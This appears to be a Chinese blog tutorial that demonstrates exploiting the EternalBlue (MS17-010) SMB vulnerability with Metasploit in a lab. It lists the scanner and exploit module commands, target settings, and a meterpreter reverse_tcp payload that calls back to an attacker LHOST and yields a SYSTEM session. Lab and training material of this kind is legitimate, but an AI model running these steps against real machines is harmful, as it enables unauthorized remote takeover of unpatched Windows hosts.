msf-永恒之蓝利用演示

发布时间 2023-08-28 22:50:59作者: 小吕不忧伤

使用Msf演示永恒之蓝漏洞的利用过程

MSF的功能模块介绍
MSF所用功能主要可分为这几个模块,每个模块都有各自的功能领域,形成了渗透测试的流程

1、Auxiliary(辅助模块)
为渗透测试信息搜集提供了大量的辅助模块支持
2、Exploits(攻击模块)
利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。
3、Payload(攻击载荷模块)
攻击成功后促使靶机运行的一段植入代码
4、Post (后渗透攻击模块)
收集更多信息或进一步访问被利用的目标系统
5、Encoders(编码模块)
将攻击载荷进行编码,来绕过防护软件拦截

 

永恒之蓝漏洞演示:

靶机网络信息

攻击机网络信息

 

连通性测试

 

msf数据库启用

启动

永恒之蓝漏洞测试

永恒之蓝的漏洞编号:ms17-010

根据漏洞名称搜索 : search ms17_010

 

辅助模块扫描目标
设置模块:use auxiliary/scanner/smb/smb_ms17_010

查看设置:options

 


设置所需信息

设置目标地址:set rhosts 192.168.174.129

目标端口默认是445,
如果用nmap端口扫描windows文件共享服务不是开放在445端口上面,那这里需要进行修改,set rport 目标端口

设置好了之后,run或者exploit 进行攻击

绿色的加号为可攻击

2、设置攻击模块对目标进行攻击
使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue

查看所需设置:options

设置所需信息:

设置目标地址:set RHOSTS 192.168.48.219

设置目标端口:set RPORT 445

设置payload:set payload windows/x64/meterpreter/reverse_tcp

设置本地地址:set LHOST 192.168.48.140

 

攻击:run或者exploit
 

攻击成功,成功拿到会话

查看目前权限 gutuid

系统权限